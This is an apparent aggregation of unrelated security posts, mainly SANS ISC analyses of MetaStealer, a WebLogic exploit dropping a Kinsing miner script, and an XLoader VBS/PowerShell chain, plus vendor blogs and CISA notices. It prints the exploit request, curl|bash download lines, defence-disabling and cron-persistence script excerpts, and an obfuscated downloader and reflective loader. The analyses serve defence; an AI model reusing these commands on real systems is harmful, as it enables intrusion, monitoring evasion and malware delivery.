port 80 – transfer[.]sh – GET /get/qT523D/Wlniornez_Dablvtrq.bmp              port 443 – hxxps://transfer[.]sh/get/qT523D/Wlniornez_Dablvtrq.bmp                                                  193.106.191[.]162 port 1775 – 193.106.191[.]162:1775 – GET /avast_update                                    193.106.191[.]162 port 1775 – 193.106.191[.]162:1775 – GET /api/client/new                                 193.106.191[.]162 port 1775 – 193.106.191[.]162:1775 – POST /tasks/get_worker

Alerts on traffic to 193.106.191[.]162 over TCP port 1775:

ETPRO MALWARE Win32/MetaStealer Related Activity (GET) sid: 2851362ETPRO MALWARE Win32/MetaStealer Related Activity (POST) sid: 2851363

Associated malware and artifacts:

SHA256 hash: 981247f5f23421e9ed736dd462801919fea2b60594a6ca0b6400ded463723a5e

File size: 88,069 bytesFile name: transfer_info2460.xlsFile description: Example of email attachment, an Excel file with macro for malwareSandbox analysis: https://app.any.run/tasks/02a6b252-5ea1-4f2b-96d3-4eb2eaec34ca

SHA256 hash: 81e77fb911c38ae18c268178492224fab7855dd6f78728ffedfff6b62d1279dc

File size: 2,828 bytesFile name: open.vbsFile location: same directory as the above Excel file or the user’s AppData/Local/Temp directoryFile description: After enabling macro, this VBS file is used to create the persistent EXENote: I could not find this file on my infected lab host

SHA256 hash: 8cfa23b5f47ee072d894ee98b1522e3b8acc84a6e9654b71f50536e74a3579a5

File size: 417,512 bytesFile location: hxxps://raw.githubusercontent[.]com/michel15P/1/main/notice.zipFile type: dataFile description: data binary retrieved by open.vbs used to persistent EXE (below)

SHA256 hash: f644bef519fc0243633d13f18c97c96d76b95b6f2cbad2a2507fb8177b7e4d1d

File size: 367,001,600 bytesFile location: C:Users[username]AppDataLocalTempnotice.exeFile location: C:Users[username]AppDataRoamingqwveqwveqw.exeFile description: Malware EXE persistent on the infected Windows hostNote: This binary is appended with more than 366 MB of zero byte fillerNote: Persistent through “Shell” value at HKCUSOFTWAREMicrosoftWindows NTCurrentVersionWinlogon

SHA256 hash: 7641ae596b53c5de724101bd6df35c999c9616d93503bce0ffd30b1c0d041e3b

File size: 143,400 bytesFile description: Persistent malware EXE with most of the zero byte filler removed

SHA256 hash: fba945b78715297f922b585445c74a4d7663ea2436b8c32bcb0f4e24324d3b8b

File size: 716,288 bytesFile location: hxxps://transfer[.]sh/get/qT523D/Wlniornez_Dablvtrq.bmpFile type: dataFile description: Retrieved by persistent EXE, this binary is a Windows DLL file in reverse byte order

SHA256 hash: bf3b78329eccd049e04e248dd82417ce9a2bcaca021cda858affd04e513abe87

File size: 716,288 bytesFile description: Windows DLL file created by reserving the above binaryFile type: PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS WindowsRun method: loaded/run by persistent EXE

SHA256 hash: cb6254808d1685977499a75ed2c0f18b44d15720c480fb407035f3804016ed89

File size: 2,182,488 bytesFile location: hxxp://193.106.191[.]162:1775/avast_updateFile description: base64 text representing a Windows DLL file

SHA256 hash: 71e54b829631b93adc102824a4d3f99c804581ead8058b684df25f1c9039b738

File size: 1,636,864 bytesFile description: Windows DLL file converted from the above textFile type: PE32 executable (DLL) (console) Intel 80386, for MS WindowsRun method: unknown, loaded/run by persistent EXE or previous DLL loaded/run by persistent EXE

Final words

Each time I rebooted my infected Windows host, the persistent EXE generated traffic to the same transfer.sh URL and re-started the infection process without the Github traffic.

Malware associated with this infection was first submitted to VT on Wednesday 2022-03-30.  ETPRO signatures identifying HTTP traffic generated by this malware as MetaStealer were released on Friday 2022-04-01.

My thanks to Security Onion, Proofpoint’s EmergingThreats team, and Didier Stevens’ tools for reversing binaries. These three resources were a big help in my analysis for this diary.

A pcap of the infection traffic and the associated malware/artifacts can be found here.

—Brad Duncanbrad [at] malware-traffic-analysis.net

(c) SANS Internet Storm Center. https://isc.sans.edu Creative Commons Attribution-Noncommercial 3.0 United States License.

large.png

Looking through my honeypot logs for some Spring4Shell exploits (I didn’t find anything interesting), I came across this attempt to exploit an older WebLogic vulnerability (likely %%cve:2020-14882%% or %%cve:2020-14883%%). The exploit itself is “run of the mill,” but the script downloaded is going through an excessively long list of competitors to disable and disabled cloud monitoring tools, likely to make detecting and response more difficult. Many organizations will not notice that they do not receive any more alerts 😉

The initial exploit came from %%ip:109.237.96.124%% (IP is in Russia and has been scanning for port 7001 for a couple of weeks now):

POST /console/images/%252e%252e%252fconsole.portal HTTP/1.1
Host: [redcated]:8080
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML,
 like Gecko) Chrome/78.0.3904.108 Safari/537.36
Content-Type: application/x-www-form-urlencoded
Accept-Encoding: gzip
Content-Length: 148
Connection: Keep-Alive

_nfpb=true&_pageLabel=&handle=com.bea.core.repackaged.springframework.context.support.FileSystemXmlApplicationContext(“http://185.231.153.4/wb.xml”)

It is pretty apparent from the above code that the exploit attempts to download wb.xml from %%ip:185.231.153.4%% (another Russian IP. Appears not to be involved in any active scanning).

 <beans xmlns=”http://www.springframework.org/schema/beans” xmlns:xsi=”http://www.w3.org/2001/XMLSchema-instance” xsi:schemaLocation=”http://www.springframework.org/schema/beans http://www.springframework.org/schema/beans/spring-beans.xsd”>
    <bean id=”pb” class=”java.lang.ProcessBuilder” init-method=”start”>
        <constructor-arg>
            <list>
                <value>/bin/bash</value>
                <value>-c</value>
                <value><![CDATA[(curl -s 185.231.153.4/wb.sh||wget -q -O- 185.231.153.4/wb.sh)|bash]]></value>
            </list>
        </constructor-arg>
    </bean>
</beans>

This leads us to wb.sh, downloaded from the same host. wb.sh is the actual script installing the miner and disabling the competition. I will not post the full script here as it is too long. But just samples from various parts. The SHA256 hash of wb.sh is ea8727980efe4be07bcbaf300f7e7af354589b81c1bf7ca474a19ac9dcc01b1b. 

It starts with disabling various typical security limits (note the changes to the /tmp directories. That is not super common)

touch /tmp/zzza
ulimit -n 65535
rm -rf /var/log/syslog
chattr -iua /tmp/
chattr -iua /var/tmp/
chattr -R -i /var/spool/cron
chattr -i /etc/crontab
ufw disable
iptables -F

[ and more… ]

Next, it uninstalls and kills the “aliyun-service.” Aliyun(Alibaba Cloud) installs by default various monitoring and security tools. The script downloads a tool to disable them.

if ps aux | grep -i ‘[a]liyun’; then
  curl http://update.aegis.aliyun.com/download/uninstall.sh | bash
  curl http://update.aegis.aliyun.com/download/quartz_uninstall.sh | bash
  pkill aliyun-service
  rm -rf /etc/init.d/agentwatch /usr/sbin/aliyun-service
  rm -rf /usr/local/aegis*
  systemctl stop aliyun.service
  systemctl disable aliyun.service
  service bcm-agent stop
  yum remove bcm-agent -y
  apt-get remove bcm-agent -y
elif ps aux | grep -i ‘[y]unjing’; then
  /usr/local/qcloud/stargate/admin/uninstall.sh
  /usr/local/qcloud/YunJing/uninst.sh
  /usr/local/qcloud/monitor/barad/admin/uninstall.sh
fi

Next, it starts to kill processes that connect to specific IP addresses. Not sure about the significance of the IP addresses (185.71.65.238, 140.82.52.87, 34.81.218.76, 42.112.28.216, 207.38.87.6, 42.112.28.216). For example:

netstat -anp | grep 185.71.65.238 | awk ‘{print $7}’ | awk -F'[/]’ ‘{print $1}’
| xargs -I % kill -9 %

And it kills processes connecting to various ports regardless of the IP (143, 2222, 3333,3389, 4444, 5555, and more). As many miner scripts do, it also has a long list of process names it kills like:

pkill -f .javae
pkill -f .syna
pkill -f .main
pkill -f xmm
pkill -f solr.sh

It appears to kill competing miners and some valid processes, maybe to free up CPU cycles for the miner or to eliminate competitors masquerading as a valid process. It even goes so far as to check if any miners are running inside docker:

docker ps | grep “auto” | awk ‘{print $1}’ | xargs -I % docker kill %
docker ps | grep “xmr” | awk ‘{print $1}’ | xargs -I % docker kill %
docker ps | grep “mine” | awk ‘{print $1}’ | xargs -I % docker kill %
docker ps | grep “monero” | awk ‘{print $1}’ | xargs -I % docker kill %
docker ps | grep “slowhttp” | awk ‘{print $1}’ | xargs -I % docker kill %

Finally, we get to download the miner:

BIN_MD5=”2c44b4e4706b8bd95d1866d7867efa0e”
BIN_DOWNLOAD_URL=”http://185.231.153.4/kinsing”
BIN_DOWNLOAD_URL2=”http://185.231.153.4/kinsing”
BIN_NAME=”kinsing”

This malware is nothing new and well known to Virustotal [1]

The malware achieves persistence by adding a cron job:

echo “* * * * * $LDR http://185.191.32.198/wb.sh | sh > /dev/null 2>&1”

In summary:

Specifically, disabling the Alibaba Cloud monitoring tools is new to me. I didn’t see any other endpoint security tools disabled (sure, things like SELinux and such, but no AV tools). Maybe I missed some among the long list of “kill” commands. But essentially, this script is targeting Alibaba Cloud users and assuming the machine they are breaching is pretty much unused and nobody but Alibaba is monitoring it.

[1] https://www.virustotal.com/gui/file/5d2530b809fd069f97b30a5938d471dd2145341b5793a70656aad6045445cf6d


Johannes B. Ullrich, Ph.D. , Dean of Research, SANS.edu
Twitter|

(c) SANS Internet Storm Center. https://isc.sans.edu Creative Commons Attribution-Noncommercial 3.0 United States License.

large.png

 File sharing is a classic operation performed by many people on a daily basis. If you can share files using big players like Dropbox or all the *Drive (“One”, “Google”, etc), there exists a lot of free alternatives that help to easily share files with peers. Because, still today, many organizations do not provide an “official” (read: promoted, supported, and monitored) service, users are always looking for alternatives. There are plenty of tools available like Lufi[1] or transfer.sh[2] (they are plenty of others). The sample that I spotted yesterday was delivered through the second one.

The initial payload was a gzip’d RAR archive (SHA256:949ce2559baa5021ac55523ece74c52bcf39b74d94352d9697b60594034c6dfc)

remnux@remnux:/MalwareZoo/20220323$ gzip -d -c Files.gz | file –
/dev/stdin: RAR archive data, v5
remnux@remnux:/MalwareZoo/20220323$ gzip -d Files.gz && unrar t Files

UNRAR 5.50 freeware Copyright (c) 1993-2017 Alexander Roshal

Testing archive Files

Testing COMPILLED LIST OF ITEMS.vbs OK
Testing Item’s Specification & Drawings.vbs OK
Testing Company’s Introduction.vbs OK
All OK

All three files in the archive are the same. Here is the (beautified) code:

KKJDSKJDJKDSDSDSJKDSKJDSKDSKDKJSDKJSKDSKDSJKDSJKDSKJDSKDDKJEKJDKJDJKDKJDSJKDS = “W”&”s”&”c”&”r”&”i”&CHR(80)&”t.”&”s”&”h”&CHR(69)&”l”&”l”
Set HFDJHDFSHJDFSHDFHDSHFDSHFHFHSHFKFHKFHSFHKFSHKFHKFHFFHDSFSHDFHSDFFHSSFHD = CreateObject(KKJDSKJDJKDSDSDSJKDSKJDSKDSKDKJSDKJSKDSKDSJKDSJKDS
KJDSKDDKJEKJDKJDJKDKJDSJKDS)
SJKHSKHSDKHHKSDSDKHSDKHHDSKDSHKHKDSDHKDSK = “PoWERsh”
HDFHKFDKHHKDFHKHDFHKK = “E”
GHDSHGDHDSKHDSKHDSKHDSHKDSKHDSDSKHDKSHKDSKHDSKHSDHDSKHDSHKDSHK = “”+SJKHSKHSDKHHKSDSDKHSDKHHDSKDSHKHKDSDHKDSK+HDFHKFDKHHKDFHKHDFHKK+”LL -exeC
utiO BYpASS -C i`Ex( N`eW-oB`jEct neT.We`BcLi`ENt ).dOwNloadSTrinG(‘hxxps://transfer[.]sh/get/z16it2/rraammm.ps1’) ”
HFDJHDFSHJDFSHDFHDSHFDSHFHFHSHFKFHKFHSFHKFSHKFHKFHFFHDSFSHDFHSDFFHSSFHD.Run(GHDSHGDHDSKHDSKHDSKHDSHKDSKHDSDSKHDKSHKDSKHDSKHSDHDSKHDSHKDSHK),0

Pretty simple, it fetches the next payload through a share on transfer.sh.

hxxps://transfer[.]sh/get/z16it2/rraammm.ps1

The Powershell code is:

$whatever = “dXNpbmcgU3lzd … (stuff deleted) … b3NlKCk7fX19”;
$dec = [Text.Encoding]::Utf8.GetString([Convert]::FromBase64String($whatever));
Add-Type -TypeDefinition $dec;
$instance = New-Object SKWTFPdZCH.DpGVQhBvSm.HqEHXQYiIxCnIoaXttSHgHoMU;
$instance.HxQcKKablTACrmEGBODiYOG
hW();

$whatever contains another payload used to inject the PE and execute it:

using System;using System.IO;using System.Net;
using System.Reflection;using System.Threading;
namespace SKWTFPdZCH.DpGVQhBvSm
{
  public class HqEHXQYiIxCnIoaXttSHgHoMU
{
  private const string VhuixZgiqqTTIkrGvgRwUtDFE=”hxxps://transfer[.]sh/get/ACEDn1/sdr.exe”;
  private MemoryStream XaXaVkSGstrUmNTeLpgVnccuS=new MemoryStream();
  [STAThread] public void HxQcKKablTACrmEGBODiYOGhW()
{
  gmrjNtqiFbYCZLoofQZiMGGJt();
  imYCaeLWaNVtuIupBojHByURJ();
  }
private void imYCaeLWaNVtuIupBojHByURJ()
{
  byte[]buffer=XaXaVkSGstrUmNTeLpgVnccuS.ToArray();
  Assembly assembly=null;
  if(Environment.Version.Major>=4)
{
  MethodInfo method=Type.GetType(“System.Reflection.RuntimeAssembly”).GetMethod(“nLoadImage”,BindingFlags.NonPublic|BindingFlags.Static);
assembly=(Assembly)method.Invoke(null,new object[]{buffer,null,null,null,false,false,null});
  }
  else
{
  MethodInfo method=Type.GetType(“System.Reflection.Assembly”).GetMethod(“nLoadImage”,BindingFlags.NonPublic|BindingFlags.Static);
  assembly=(Assembly)method.Invoke(null,new object[]{buffer,null,null,null,false});
  }
object[]args=new object[1];
  if(assembly.EntryPoint.GetParameters().Length==0)
args=null;
  assembly.EntryPoint.Invoke(null,args);
  }
private void gmrjNtqiFbYCZLoofQZiMGGJt()
{
  WebRequest request=WebRequest.Create(VhuixZgiqqTTIkrGvgRwUtDFE);
  WebResponse response=request.GetResponse();
  using(Stream web_stream=response.GetResponseStream())
{
  byte[]buffer=new byte[8192];
  int read=0;
  while((read=web_stream.Read(buffer,0,buffer.Length))>0)
{
  XaXaVkSGstrUmNTeLpgVnccuS.Write(buffer,0,read);
  }
  }
response.Close();
  }
  }
}

The final payload (sdr.exe) is again downloaded from transfer.sh. It’s an XLoader[3] sample.

It could be interesting to hunt for such file-sharing services in your logs… From a security point of view, Lufi is nice because all crypt/decrypt operations are performed on the client-side and the server does not see the content of shared files. However, this prevents files to be downloaded by headless browsers. transfer.sh is pretty simple and is, therefore, a nice solution for attackers! This technique is better for attackers because they don’t have to compromise a website to drop their malicious content. Note that a Lufi instance could be perfectly used in a phishing campaign (via a link in the mail).

I’m running my own instance of Lufi as a honeypot and keeping an eye on it but, until now, it was never abused…

[1] https://framagit.org/fiat-tux/hat-softwares/lufi
[2] https://transfer.sh
[3] https://malpedia.caad.fkie.fraunhofer.de/details/osx.xloader

Xavier Mertens (@xme)
Xameco
Senior ISC Handler – Freelance Cyber Security Consultant
PGP Key

(c) SANS Internet Storm Center. https://isc.sans.edu Creative Commons Attribution-Noncommercial 3.0 United States License.

HermeticWiper.jpg

Written by: Vikram Navali – Senior Technical Product Manager, As the Ukraine-Russia conflict is gathering attention from everyone worldwide, a massive data-wiping malware called HermeticWiper hit multiple organizations in Ukraine. According to ESET researchers, threat actors have been in preparation for a couple of months before they could launch a full-fledged attack.

Background of the HermeticWiper Malware Attack

As per Cisco’s Threat advisory report, the deployment of the destructive HermeticWiper malware began on Feb. 23, 2022. HermeticWiper is a malware type that can erase all the data from a victim’s system. The research also revealed that the wiper abuses legitimate drivers from the EaseUS Partition Master software to corrupt data. The Wiper binary is signed using a code signing certificate issued to Hermetica Digital Ltd.

How Impactful is the HermeticWiper Malware?

This malware is quite impactful and different from other malware types that destroy data recovery tools without leaving any attack traces.

The malware has two components designed for destruction: one that targets the Master Boot Record (MBR) and another targeting partitions.

The wiper process begins by gaining SeShutDownPrivilege (to shut down the endpoint once it’s wiped the drives) and SeBackupPrivilege (to retrieve file contents for files whose security descriptor does not grant such access).

The wiper corrupts the MBR for every physical drive, enumerates individual partitions, and corrupts the partition data after destroying the Volume Shadow Copy Service (VSS) and corrupting other files necessary for file system operations. It then initiates a reboot to complete the wipe.

The research also discovered that threat actors have already compromised the Active Directory (AD) infrastructure in one of the Ukrainian’s targeted organizations and dropped the wiper via a default group policy object (GPO). They have gathered information on Group Policy settings and identified paths for privilege escalation.

How Can Attivo Networks Solution Help?

Attivo Networks solutions offer advanced protection for Active Directory, identifying specific domain, computer, and user-level risks and detecting live attacks. The ADSecure solution prevents Active Directory compromise by concealing objects in AD and stopping attacks that target them. The ADAssessor solution helps identify vulnerabilities in Active Directory Group Policy Preferences and permissions allow threat actors to perform privilege escalation. Additionally, the solution can deploy deceptive SYSVOL Group Policy Objects in the production AD infrastructure. The solution detects and raises high-fidelity alerts when an attacker collects GPO information to determine a potential attack path.

The EDN capabilities detect Indicators of Compromise (IoC) such as file deletion, shadow volumes deletion, etc., and prevent the malware from deleting backup files created using Windows Volume Shadow Copy Service (VSS).

Additionally, Attivo Networks provides simple and flexible deployment solutions to identify threats and remediate them quickly. For more information, please visit https://www.attivonetworks.com/solutions/threat-detection/active-directory-protection/. 

Sign up for free trial offers on Active Directory security assessments and continuous visibility to AD vulnerabilities.

Conclusion

In the current situation of the Ukraine crisis, it is crucial to understand how cyber security can play a more significant role in safeguarding digital information against malicious or accidental threats. Organizations must implement a defense-in-depth strategy and deploy cyber security solutions across several barriers to prevent malicious activity.

The post HermeticWiper: A New Data Wiper Malware Targeting Ukraine Systems appeared first on Attivo Networks.

Analyzing New Malware

In the ever-changing world of cybersecurity, new threats appear and evolve on a regular basis. Sharing information about them is an important part of fighting cybercrime and keeping people and organizations safe. To do so efficiently, being prepared will make the best use of your—and your team’s—time when analyzing an emerging threat.

In this blog, we cover various situations that researchers encounter when they need to publish their findings and provide some suggestions on how to approach them, along with a suggested workflow for approaching the analysis most efficiently. Finally, we apply this strategy to analyze a ransomware sample.

Efficient analysis of new executable samples is extremely important when sharing information on evolving threats

Efficient analysis is extremely important when investigating new malware.

Challenges and Solutions

When a new threat emerges, there are a few common challenges that researchers face during analysis. Here are a few ways to handle them so you can produce clear and purposeful findings.

Urgency

In many cases, there is a relatively narrow window of time in which to release the publication, if we want the topic to be hot and the corresponding material to be relevant.

The solution is to focus on the most important questions that need answers.

Who are the potential readers of the article? How will they benefit from reading it?
How will the time costs associated with each section compare to its benefits?

Beginning your work by answering these questions will help shape the material in the right direction and manage time properly.

Novelty

For many attacks that hit the news, the related malware may not yet have been analyzed by other researchers. This increases the amount of work required to understand all parts of the relevant functionality, as there is little to no information to use as a starting point.

To address this issue, it is worth remembering that in many cases, modern malware families and attacker groups already have some roots. Tracking these connections allows researchers to find previous iterations of similar projects and reduce the amount of time required to understand malware’s functionality.

Complexity

The consequences of simple cyberattacks aren’t generally big enough to attract the attention of the public. What that means for researchers is that if something is worth writing an article about, it’s likely to be quite complex and therefore time-consuming to analyze.

The solution here might be to split the big task into smaller tasks. Apart from prioritizing based on the article’s focus, it also allows the analysis to done by a group, with different people focusing on different parts of functionality. Exchanging knowledge on a regular basis about what has already been covered will help the team to be efficient and not waste time analyzing the same parts multiple times.

Suggested Workflow

Here is a common workflow that should allow researchers to approach the analysis of new executable samples efficiently and effectively.

The second step, Behavioral Analysis, refers to the blackbox-style analysis that generally involves the execution of a sample under various monitoring tools and on sandboxes. The Dynamic Analysis step refers the use of a debugger to execute instructions.

Steps

Actions

1. Triage

Collect as much easily-accessible open information as possible. This can come from existing articles, public sandbox reports, or other vendors’ detections.

Check for the presence of high-entropy blocks, import table or syscalls and strings to understand if it likely to be packed or not.

Check if some official (non-malicious) packers were used by using packer detection tools.

2. Behavioral Analysis

Conduct this analysis if it is easy to restore the lab environment after execution.

It may not be necessary if good public sandbox reports are already available.

Keep in mind that, often, behavioral analysis doesn’t show the full picture.

It may not go as expected because of anti-RE techniques involved.

3. Unpacking – Optional

Not necessarily present, some malware developers prefer to only use obfuscation.

For official packers, there are multiple existing unpacking tools and scripts already available.

Ideally, the unpacked sample should remain executable to make the dynamic analysis easy. Otherwise, get as much unpacked code and data as possible.

4. Static and Dynamic Analysis of the Actual Functionality

This step only becomes possible once the unpacking is done (if it was necessary).

Generally, strings and APIs give the maximum information and serve as important landmarks to facilitate navigation within the samples.

Keep the markup accurate: rename functions, create structures, define enums and leave comments where necessary.

Debugging is mainly needed to decrypt/decode/decompress code and data and resolve APIs. Static analysis is generally enough for the rest.

Applying the Workflow to Malware Analysis

Let’s take a look at a DarkSide ransomware sample, which we analyzed earlier this year: 0a0c225f0e5ee941a79f2b7701f1285e4975a2859eb4d025d96d9e366e81abb9

Step 1: Triage

At the time of analysis, the sample had already been uploaded to Virustotal, so all cybersecurity community members could benefit from access and were able to see AV vendors’ detections as well as the sandbox logs in the Behavior tab. Note that there are now multiple sandboxes supported in Virustotal, so try a few to find a good report.

Multiple sandbox options on Virustotal.

Multiple sandbox options on Virustotal.

A quick look at the sample in the hex editor reveals that there is a high-entropy block at the end. There are multiple things it could be: the next stage payload or another module, a blob containing encrypted strings or configuration, etc. Static analysis will be required to understand it.

A high-entropy block

A high-entropy block.

There are pretty much no meaningful strings and APIs:

PCB overview of the Verkada D40 camera.

Very few entries in the import table.

This is a strong indicator that the sample is obfuscated with APIs resolved dynamically and strings encrypted. Running a packer detection tool (PEiD with custom community signatures) confirms that there is no indication that public packers have been used in this case.

PEiD did not identify any known packers

PEiD did not identify any known packers.

Step 2: Behavioral Analysis

By the time the analysis began, the sample had already been submitted to various public sandboxes by other community members, so lots of information could be taken from there.

File activity in the public any.run report

File activity in the public any.run report.

Step 3: Unpacking

Checking cross-references to the high-entropy block in the disassembler, we can see that this doesn’t seem to be the next stage payload as there is no control transfer to it or related blocks. In addition, a quick look around the disassembly confirms that the sample is indeed obfuscated rather than packed with multiple APIs resolved dynamically by hashes and with strings encrypted.

API resolution by hashes

API resolution by hashes.

A call to the not-yet-resolved API

A call to the not-yet-resolved API.

Step 4: Static and Dynamic Analysis of the Actual Functionality

In order to be able to efficiently navigate the disassembly, we need to make APIs and strings easily readable.

For APIs, this is very easy to achieve with dynamic analysis as all the APIs are resolved in a single function. Therefore, letting it execute until the end will give us all the APIs’ addresses. To propagate their names to the pointers, use standard renimp.idc script shipped as part of IDA Pro.

Resolved APIs’ names

Resolved APIs’ names.

This approach won’t work for strings, as they’re decrypted on an ad-hoc basis just before being used, rather than in a single place. Therefore, to make them easily visible, scripting will be required. In our blog on Darkside, we have already provided such a script that will attempt to find all the encrypted strings and decrypt them.

Before string decryption

Before string decryption.

After string decryption.

After string decryption.

That’s it. Now when both strings and APIs are visible, the only thing left to engineer is to carefully go through cross references and keep the markup for the corresponding functions describing all potentially interesting information (subject to the target audience) in the article.

Conclusion

Knowledge sharing is an important part of the cybersecurity field that allows us to quickly adapt to new threats and minimize their associated risks. By properly focusing our efforts, we can improve the quality of this process and make the world a safer place.

icon-lightbulb.png

Extra Tips

Know your audience – the content of the technical blog post (and the corresponding questions to answer) will be very different from a news article for the general public
Consider teamwork to speed up the process – Asking for help if at an early stage helps increase the total time available for the analysis
Have your templates ready – simple scripts to decrypt / decode / decompress the data may help avoid unnecessary delays

Related Content

OT IoT Security 2021 1H Research Report

RESEARCH REPORT
OT/IoT Security Report

What You Need to Know to Fight Ransomware and IoT VulnerabilitiesJuly 2021

RANSOMWARE

Why ransomware is a formidable threat
How Ransomware as a Service works
Analysis of DarkSide, the malware that attacked Colonial Pipeline

VULNERABILITIES

Latest ICS and medical device vulnerability trends

IoT SECURITY CAMERAS

Why P2P security camera architecture threatens confidentiality
How security cameras are vulnerable
Research findings on surveillance cameras

RECOMMENDATIONS

Ten measures to take immediately to defend your systems

Download

Related Links

Blog: BlackMatter Ransomware Technical Analysis and Tools from Nozomi Networks Labs
Blog: Critical Log4shell (Apache Log4j) Zero-Day Attack Analysis
Blog: Colonial Pipeline Ransomware Attack: Revealing How DarkSide Works
Blog: Enhancing Threat Intelligence with the MITRE ATT&CK Framework

The post How to Analyze Malware for Technical Writing appeared first on Nozomi Networks.

Authors: Gorang Joshi & Chandan S – A credential-based attack occurs when an attacker steals credentials, extends privileges, and compromises critical data. Credential theft is the first stage of a lateral movement attack and stopping the attack early in the process can make a material impact on the success and damages incurred by an attacker.

RedLine Stealer malware was found to be used by attackers extensively to harvest saved credentials from applications such as browsers and windows credential manager. Several fake installers of renowned software have been reported for dropping the Redline Stealer malware. Using this tool, it is remarkably easy to retrieve and save credentials from any application. This malware when dropped, scans the affected endpoint for Crypto Wallets, Browser Login Credentials, Cookies, VPN client credentials and Instant Messaging Applications. A credential theft allows attackers access to a slew of other resources on the network. And much of these can be accessed by attackers without getting detected.

The Attivo ThreatStrike Credentials Protection hides and denies unauthorized access to applications credential store. For example, only Chrome will have access to its credential store, and all other applications won’t. The product protects more than 80 of the most popular Windows applications that attackers target, with a plan to add more applications.

With RedLine Stealer gaining attention lately, Attivo research team tested the tool to see the level of Trust Issues attackers would face using such tools.

In the following section we first show how an attacker can easily grab such data using RedLine Stealer and then compare that with what happens when the same tool is run on a machine which is protected with Attivo Credentials Protection.

Figure 1: Credentials Stolen without Attivo’s ThreatStrike Credential Protection

Figure 2: Credential Theft Prevented With Attivo’s ThreatStrike Credential Protection

ThreatStrike Credential Protection from Attivo not only prevents malware from accessing production credentials, but also alerts users if such behavior is seen. The illustration below captures how alerts show up in the Events dashboard.

Figure 3: Event Level view of the Incident Occurred

Figure 4: Detailed Endpoint Report of the Incident Occurred

In a constantly changing threat landscape with advanced persistent threats using stealthy techniques like Credential Theft, preventing unauthorized access to saved credentials should be one of the top priorities for security teams. One must not rely on Anti-Malware or other Endpoint Protection Platforms to prevent usage of tools like RedLine Stealer. There is always a new method available to evade the Endpoint Protection technologies.

Attivo Credentials Protection prevents credentials theft by denying access to unauthorized applications. To learn more about the Attivo Networks EDN Suite’s new credential protection capability, read the press release here. For more information on the EDN Suite solution, go here.

The post Preventing Credential Theft by RedLine Stealer Malware appeared first on Attivo Networks.

flag.png

Original release date: July 7, 2021 | Last revised: July 8, 2021

CISA has published a new [Malware Analysis Report (MAR) on DarkSide Ransomware] and updated Alert AA21-131A: DarkSide Ransomware: Best Practices for Preventing Business Disruption from Ransomware Attacks, originally released May 11, 2021. This update adds indicators of compromise associated with a DarkSide ransomware variant that executes a dynamic-link library used to delete Volume Shadow copies available on the system.

CISA encourages users and administrators to review the following resources for more information:

AA21-131A: DarkSide Ransomware: Best Practices for Preventing Business Disruption from Ransomware Attacks
Malware Analysis Report MAR-10337801-1.v1

This product is provided subject to this Notification and this Privacy & Use policy.

flag.png

Original release date: April 22, 2021

CISA has released AR21-112A: CISA Identifies SUPERNOVA Malware During Incident Response to provide analysis of a compromise in an organization’s enterprise network by an advance persistent threat actor. This report provides tactics, techniques, and procedures CISA observed during the incident response engagement.

CISA encourages organizations to review AR21-112A for more information.

This product is provided subject to this Notification and this Privacy & Use policy.

AR21-112A

flag.png

Original release date: April 15, 2021

CISA and the Department of Defense (DoD) Cyber National Mission Force (CNMF) have analyzed additional SolarWinds-related malware variants—referred to as SUNSHUTTLE and SOLARFLARE. One of the analyzed files was identified as a China Chopper webshell server-side component that was observed on a network with an active SUNSHUTTLE infection. The webshell can provide a cyber threat actor an alternative method of accessing a network, even if the SUNSHUTTLE infection was remediated.

The U.S. Government attributes this activity to the Russian Foreign Intelligence Service (SVR).

CISA encourages users and administrators to review Malware Analysis Report MAR-10327841-1.v1, U.S. Cyber Command’s VirusTotal page, and the following resources for more information: 

CISA web page: Remediating Networks Affected by the SolarWinds and Active Directory/M365 Compromise
CISA web page: Supply Chain Compromise
CISA Alert AA20-352A: Advanced Persistent Threat Compromise of Government Agencies, Critical Infrastructure, and Private Sector Organizations

This product is provided subject to this Notification and this Privacy & Use policy.

Original release date: March 17, 2021

CISA and the Federal Bureau of Investigation (FBI) have released a Joint Cybersecurity Advisory (CSA) on TrickBot malware. A sophisticated group of cyber criminals are using phishing emails claiming to contain proof of traffic violations to lure victims into downloading TrickBot. TrickBot is a highly modular, multi-stage malware that provides its operators a full suite of tools to conduct a myriad of illegal cyber activities.

To secure against TrickBot, CISA and the FBI recommend users and administrators review AA21-076A: TrickBot Malware as well as CISA’s Fact Sheet: TrickBot Malware for guidance on implementing specific mitigation measures to protect against this activity.

 

This product is provided subject to this Notification and this Privacy & Use policy.

Industrial Control Systems: The New Target of Malware

During 2020, CISA issued 38 cyber alerts ranging from nation-state actors like Iran and North Korea to known ransomware specifically targeting pipeline operations and notably the last alert issued on December 17, 2020, Advanced Persistent Threat Compromise of Government Agencies, Critical Infrastructure, and Private Sector Organizations, for the SolarWinds supply chain attack.

2020 represents a 660% increase in cyber alerts over 2019, during which CISA issued five cyber warnings over the full year.

Organizations across the board also saw a growing number of adversaries targeting and attacking industrial control systems (ICS) and operational technology (OT) networks. It’s a trend that is clearly continuing into the new year (‘Dangerous Stuff’: Hackers Tried to Poison Water Supply of Florida Town).

And as the attack surface continues to expand for critical infrastructure with owners and operators adopting new technologies to improve operational efficiencies, the increased vulnerabilities and targeting of ICS systems and OT networks is expected to rise.

The post Industrial Control Systems: The New Target of Malware appeared first on Security Boulevard.

A vulnerability, which was classified as problematic, was found in Malwarebytes up to 3.x on macOS (Anti-Malware Software). Affected is the function posix_spawn of the component Launch Daemon. Upgrading to version 4.0 eliminates this vulnerability.

Es wurde eine Schwachstelle in Malwarebytes bis 3.x auf macOS (Anti-Malware Software) gefunden. Sie wurde als problematisch eingestuft. Betroffen hiervon ist die Funktion posix_spawn der Komponente Launch Daemon. Ein Upgrade auf die Version 4.0 vermag dieses Problem zu beheben.

Una vulnerabilità di livello problematico è stata rilevata in Malwarebytes fino 3.x su macOS (Anti-Malware Software). Riguarda la funzione posix_spawn del componente Launch Daemon. L’aggiornamento alla versione 4.0 elimina questa vulnerabilità.

An anonymous reader quotes a report from ZDNet: For more than five years, macOS users have been the targets of a sneaky malware operation that used a clever trick to avoid detection and hijacked the hardware resources of infected users to mine cryptocurrency behind their backs.

SDfb.jpg

An issue was discovered in Malwarebytes before 4.0 on macOS. A malicious application was able to perform a privileged action within the Malwarebytes launch daemon. The privileged service improperly…

